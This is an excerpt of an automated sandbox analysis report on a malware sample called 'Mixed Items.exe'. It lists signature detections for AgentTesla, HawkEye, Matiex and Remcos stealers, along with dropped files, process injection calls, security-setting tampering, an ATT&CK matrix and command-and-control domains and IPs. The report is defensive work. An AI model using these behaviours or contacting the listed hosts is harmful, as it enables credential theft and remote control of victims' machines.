                        Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exeCode function: 7_2_0040A272 WriteProcessMemory,GetVersionExW,CreateRemoteThread,
                        Source: C:\Users\user\Desktop\Mixed Items.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                        Lowering of HIPS / PFW / Operating System Security Settings:

                        barindex
                        Changes security center settings (notifications, updates, antivirus, firewall)Show sources
                        Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
                        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
                        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                        Stealing of Sensitive Information:

                        barindex
                        Yara detected AgentTeslaShow sources
                        Source: Yara matchFile source: 00000019.00000003.321855545.0000000004361000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000024.00000002.510313698.0000000002771000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000003.328468981.00000000043CD000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000024.00000002.476647618.0000000000162000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000021.00000002.476654920.0000000000E52000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000003.300769006.0000000000FE3000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000021.00000002.516404488.0000000003411000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000024.00000000.332943540.0000000000162000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\origigoods20.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\origigoods40.exe, type: DROPPED
                        Source: Yara matchFile source: 33.2.origigoods20.exe.e50000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 33.0.origigoods20.exe.e50000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 36.2.origigoods40.exe.160000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 36.0.origigoods40.exe.160000.0.unpack, type: UNPACKEDPE
                        Yara detected HawkEye KeyloggerShow sources
                        Source: Yara matchFile source: 0000001E.00000002.392659949.00000000004C2000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001E.00000000.309264681.00000000004C2000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001E.00000002.445844944.0000000002FEC000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, type: DROPPED
                        Source: Yara matchFile source: 30.2.hawkgoods.exe.51fa72.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.4031bf.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.2.hawkgoods.exe.4c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.0.hawkgoods.exe.51fa72.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.0.hawkgoods.exe.4c8208.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.0.hawkgoods.exe.4c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.2.hawkgoods.exe.4c8208.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.0.hawkgoods.exe.4c9c0d.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.2.hawkgoods.exe.4c9c0d.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.4095c7.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.40afcc.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.4031bf.3.raw.unpack, type: UNPACKEDPE
                        Yara detected MailPassViewShow sources
                        Source: Yara matchFile source: 0000001E.00000002.392659949.00000000004C2000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001E.00000002.446976394.0000000003BC1000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001E.00000000.309264681.00000000004C2000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, type: DROPPED
                        Source: Yara matchFile source: 30.0.hawkgoods.exe.51fa72.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.2.hawkgoods.exe.51fa72.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.4031bf.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.2.hawkgoods.exe.4c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.0.hawkgoods.exe.51fa72.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.0.hawkgoods.exe.4c8208.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.2.hawkgoods.exe.3bc7e00.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.0.hawkgoods.exe.4c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.2.hawkgoods.exe.4c8208.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.2.hawkgoods.exe.3bc7e00.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.2.hawkgoods.exe.51fa72.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.0.hawkgoods.exe.4c9c0d.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.2.hawkgoods.exe.4c9c0d.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.4095c7.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.40afcc.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.4031bf.3.raw.unpack, type: UNPACKEDPE
                        Yara detected Matiex KeyloggerShow sources
                        Source: Yara matchFile source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000003.313769407.00000000037B0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000002.476632403.00000000004D2000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000000.312425541.00000000004D2000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe, type: DROPPED
                        Source: Yara matchFile source: 31.0.Matiexgoods.exe.4f277c.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.Matiexgoods.exe.4f277c.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.0.Matiexgoods.exe.4d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.Matiexgoods.exe.4d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.4095c7.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.40afcc.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.4031bf.3.raw.unpack, type: UNPACKEDPE
                        Yara detected Remcos RATShow sources
                        Source: Yara matchFile source: 00000025.00000002.488787782.0000000000982000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000025.00000002.490909756.0000000000A7A000.00000004.00000020.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Purchase Order.exe, type: DROPPED
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.4095c7.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.40afcc.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.4031bf.3.raw.unpack, type: UNPACKEDPE
                        Tries to harvest and steal browser information (history, passwords, etc)Show sources
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                        Yara detected WebBrowserPassView password recovery toolShow sources
                        Source: Yara matchFile source: 0000001E.00000002.392659949.00000000004C2000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001E.00000002.446976394.0000000003BC1000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001E.00000000.309264681.00000000004C2000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, type: DROPPED
                        Source: Yara matchFile source: 30.0.hawkgoods.exe.4c9c0d.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.4031bf.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.2.hawkgoods.exe.4c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.2.hawkgoods.exe.4c9c0d.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.0.hawkgoods.exe.4c8208.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.2.hawkgoods.exe.3be0240.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.2.hawkgoods.exe.3bc7e00.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.40afcc.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.0.hawkgoods.exe.4c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.2.hawkgoods.exe.4c8208.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.2.hawkgoods.exe.3be0240.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.0.hawkgoods.exe.4c9c0d.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.2.hawkgoods.exe.4c9c0d.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.4095c7.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.40afcc.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.4031bf.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000024.00000002.510313698.0000000002771000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000021.00000002.516404488.0000000003411000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000002.517244738.00000000028D1000.00000004.00000001.sdmp, type: MEMORY

                        Remote Access Functionality:

                        barindex
                        Detected HawkEye RatShow sources
                        Source: hawkgoods.exeString found in binary or memory: HawkEye_Keylogger_Stealer_Records_
                        Source: hawkgoods.exeString found in binary or memory: HawkEyeKeylogger
                        Source: hawkgoods.exeString found in binary or memory: HawkEye_Keylogger_Keylog_Records_
                        Source: hawkgoods.exeString found in binary or memory: HawkEye_Keylogger_Execution_Confirmed_
                        Yara detected AgentTeslaShow sources
                        Source: Yara matchFile source: 00000019.00000003.321855545.0000000004361000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000024.00000002.510313698.0000000002771000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000003.328468981.00000000043CD000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000024.00000002.476647618.0000000000162000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000021.00000002.476654920.0000000000E52000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000003.300769006.0000000000FE3000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000021.00000002.516404488.0000000003411000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000024.00000000.332943540.0000000000162000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\origigoods20.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\origigoods40.exe, type: DROPPED
                        Source: Yara matchFile source: 33.2.origigoods20.exe.e50000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 33.0.origigoods20.exe.e50000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 36.2.origigoods40.exe.160000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 36.0.origigoods40.exe.160000.0.unpack, type: UNPACKEDPE
                        Yara detected HawkEye KeyloggerShow sources
                        Source: Yara matchFile source: 0000001E.00000002.392659949.00000000004C2000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001E.00000000.309264681.00000000004C2000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001E.00000002.445844944.0000000002FEC000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, type: DROPPED
                        Source: Yara matchFile source: 30.2.hawkgoods.exe.51fa72.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.4031bf.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.2.hawkgoods.exe.4c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.0.hawkgoods.exe.51fa72.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.0.hawkgoods.exe.4c8208.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.0.hawkgoods.exe.4c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.2.hawkgoods.exe.4c8208.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.0.hawkgoods.exe.4c9c0d.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.2.hawkgoods.exe.4c9c0d.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.4095c7.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.40afcc.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.4031bf.3.raw.unpack, type: UNPACKEDPE
                        Yara detected Matiex KeyloggerShow sources
                        Source: Yara matchFile source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000003.313769407.00000000037B0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000002.476632403.00000000004D2000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000000.312425541.00000000004D2000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe, type: DROPPED
                        Source: Yara matchFile source: 31.0.Matiexgoods.exe.4f277c.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.Matiexgoods.exe.4f277c.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.0.Matiexgoods.exe.4d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.Matiexgoods.exe.4d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.4095c7.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.40afcc.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.4031bf.3.raw.unpack, type: UNPACKEDPE
                        Yara detected Remcos RATShow sources
                        Source: Yara matchFile source: 00000025.00000002.488787782.0000000000982000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000025.00000002.490909756.0000000000A7A000.00000004.00000020.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Purchase Order.exe, type: DROPPED
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.4095c7.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.40afcc.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.4031bf.3.raw.unpack, type: UNPACKEDPE
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 30_2_04D80E9E bind,
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 30_2_04D80A8E listen,
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 30_2_04D80A50 listen,
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 30_2_04D80E6B bind,

                        Mitre Att&ck Matrix

                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        Replication Through Removable Media1Windows Management Instrumentation231DLL Side-Loading1Exploitation for Privilege Escalation1Disable or Modify Tools21OS Credential Dumping1Peripheral Device Discovery1Replication Through Removable Media1Archive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                        Default AccountsNative API1Application Shimming1DLL Side-Loading1Deobfuscate/Decode Files or Information1Input Capture11File and Directory Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain AccountsCommand and Scripting Interpreter1Windows Service1Application Shimming1Obfuscated Files or Information3Security Account ManagerSystem Information Discovery135SMB/Windows Admin SharesInput Capture11Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local AccountsService Execution2Registry Run Keys / Startup Folder11Access Token Manipulation1Software Packing1NTDSQuery Registry1Distributed Component Object ModelClipboard Data1Scheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
                        Cloud AccountsCronNetwork Logon ScriptWindows Service1Timestomp1LSA SecretsSecurity Software Discovery261SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                        Replication Through Removable MediaLaunchdRc.commonProcess Injection111DLL Side-Loading1Cached Domain CredentialsVirtualization/Sandbox Evasion17VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol113Jamming or Denial of ServiceAbuse Accessibility Features
                        External Remote ServicesScheduled TaskStartup ItemsRegistry Run Keys / Startup Folder11Masquerading221DCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion17Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Access Token Manipulation1/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                        Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection111Network SniffingSystem Network Configuration Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                        Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronHidden Files and Directories1Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 363869 Sample: Mixed Items.exe Startdate: 05/03/2021 Architecture: WINDOWS Score: 100 78 checkip.dyndns.org 2->78 80 feromo.duckdns.org 185.157.161.113, 49731, 49733, 49744 OBE-EUROPEObenetworkEuropeSE Sweden 2->80 82 5 other IPs or domains 2->82 104 Found malware configuration 2->104 106 Malicious sample detected (through community Yara rule) 2->106 108 Multi AV Scanner detection for submitted file 2->108 112 15 other signatures 2->112 8 Mixed Items.exe 23 15 2->8         started        13 explorer.exe 2->13         started        15 svchost.exe 2->15         started        17 12 other processes 2->17 signatures3 110 May check the online IP address of the machine 78->110 process4 dnsIp5 84 liverpoolofcfanclub.com 104.21.31.39, 49706, 49730, 49732 CLOUDFLARENETUS United States 8->84 58 C:\Windows\Microsoft.NET\...\svchost.exe, PE32 8->58 dropped 60 C:\Windows\...\svchost.exe:Zone.Identifier, ASCII 8->60 dropped 62 C:\Users\user\AppData\...\Mixed Items.exe.log, ASCII 8->62 dropped 64 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 8->64 dropped 114 Creates an autostart registry key pointing to binary in C:\Windows 8->114 116 Adds a directory exclusion to Windows Defender 8->116 19 Mixed Items.exe 8->19         started        22 powershell.exe 10 8->22         started        24 powershell.exe 12 8->24         started        30 4 other processes 8->30 26 svchost.exe 13->26         started        118 Changes security center settings (notifications, updates, antivirus, firewall) 15->118 86 127.0.0.1 unknown unknown 17->86 120 Drops executables to the windows directory (C:\Windows) and starts them 17->120 file6 signatures7 process8 dnsIp9 50 C:\Users\user\AppData\...\origigoods40.exe, PE32 19->50 dropped 52 C:\Users\user\AppData\...\origigoods20.exe, PE32 19->52 dropped 54 C:\Users\user\AppData\Local\...\hawkgoods.exe, PE32 19->54 dropped 56 2 other malicious files 19->56 dropped 32 hawkgoods.exe 19->32         started        36 origigoods20.exe 19->36         started        38 origigoods40.exe 19->38         started        40 Matiexgoods.exe 19->40         started        42 conhost.exe 22->42         started        44 conhost.exe 24->44         started        88 liverpoolofcfanclub.com 26->88 122 System process connects to network (likely due to code injection or exploit) 26->122 124 Multi AV Scanner detection for dropped file 26->124 46 AdvancedRun.exe 30->46         started        48 conhost.exe 30->48         started        file10 signatures11 process12 dnsIp13 66 157.184.7.0.in-addr.arpa 32->66 68 whatismyipaddress.com 104.16.155.36, 49736, 80 CLOUDFLARENETUS United States 32->68 70 192.168.2.1 unknown unknown 32->70 90 Antivirus detection for dropped file 32->90 92 Multi AV Scanner detection for dropped file 32->92 94 Machine Learning detection for dropped file 32->94 102 2 other signatures 32->102 96 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 36->96 98 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 36->98 72 checkip.dyndns.org 40->72 74 checkip.dyndns.com 216.146.43.70, 49734, 49735, 49748 DYNDNSUS United States 40->74 76 freegeoip.app 172.67.188.154, 443, 49747 CLOUDFLARENETUS United States 40->76 100 Tries to harvest and steal browser information (history, passwords, etc) 40->100 signatures14

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        Mixed Items.exe17%ReversingLabsByteCode-MSIL.Downloader.Generic

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Local\Temp\origigoods20.exe100%AviraTR/Spy.Gen8
                        C:\Users\user\AppData\Local\Temp\origigoods40.exe100%AviraTR/Spy.Gen8
                        C:\Users\user\AppData\Local\Temp\Matiexgoods.exe100%AviraTR/Redcap.jajcu
                        C:\Users\user\AppData\Local\Temp\hawkgoods.exe100%AviraTR/AD.MExecute.lzrac
                        C:\Users\user\AppData\Local\Temp\hawkgoods.exe100%AviraSPR/Tool.MailPassView.473
                        C:\Users\user\AppData\Local\Temp\origigoods20.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\origigoods40.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\Matiexgoods.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\hawkgoods.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\Purchase Order.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe3%MetadefenderBrowse
                        C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\Matiexgoods.exe54%MetadefenderBrowse
                        C:\Users\user\AppData\Local\Temp\Matiexgoods.exe90%ReversingLabsByteCode-MSIL.Trojan.MatiexKeylogger
                        C:\Users\user\AppData\Local\Temp\hawkgoods.exe96%ReversingLabsByteCode-MSIL.Trojan.Golroted
                        C:\Users\user\AppData\Local\Temp\origigoods20.exe43%MetadefenderBrowse
                        C:\Users\user\AppData\Local\Temp\origigoods20.exe93%ReversingLabsByteCode-MSIL.Infostealer.DarkStealer
                        C:\Users\user\AppData\Local\Temp\origigoods40.exe43%MetadefenderBrowse
                        C:\Users\user\AppData\Local\Temp\origigoods40.exe86%ReversingLabsByteCode-MSIL.Infostealer.DarkStealer
                        C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe21%ReversingLabsByteCode-MSIL.Trojan.Generic

                        Unpacked PE Files

                        SourceDetectionScannerLabelLinkDownload
                        25.2.Mixed Items.exe.4031bf.3.unpack100%AviraTR/Inject.vcoldiDownload File
